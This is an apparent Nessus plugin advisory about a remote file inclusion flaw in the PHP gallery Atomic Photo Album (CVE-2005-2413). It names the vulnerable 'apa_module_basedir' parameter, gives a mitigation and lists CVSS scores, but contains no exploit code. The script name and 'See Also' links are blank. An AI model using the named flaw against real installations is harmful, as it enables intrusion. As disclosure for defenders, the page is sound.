Atomic Photo Album apa_module_basedir Parameter Remote File Inclusion

High Nessus Network Monitor Plugin ID 3111


The remote host is vulnerable to a Script Injection attack.


The remote host is running Atomic Photo Album, a free PHP-based photo gallery. The installed version of Atomic Photo Album allows remote attackers to control the 'apa_module_basedir' variable used when including PHP code in the '' script. By leveraging this flaw, an attacker may be able to view arbitrary files on the remote host and execute arbitrary PHP code, possibly taken from third-party hosts.


Enable PHP's 'magic_quotes_gpc' setting and disable 'allow_url_fopen'.

See Also

Plugin Details

Severity: High

ID: 3111

File Name: 3111.prm

Family: CGI

Published: 2005/07/25

Modified: 2016/01/22

Dependencies: 1442

Nessus ID: 19299

Risk Information

Risk Factor: High


Base Score: 7.5

Temporal Score: 7.1

Vector: CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P

Temporal Vector: CVSS2#E:H/RL:W/RC:ND


Base Score: 7.3

Temporal Score: 7.1


Temporal Vector: CVSS3#E:H/RL:W/RC:X

Reference Information

CVE: CVE-2005-2413

BID: 14368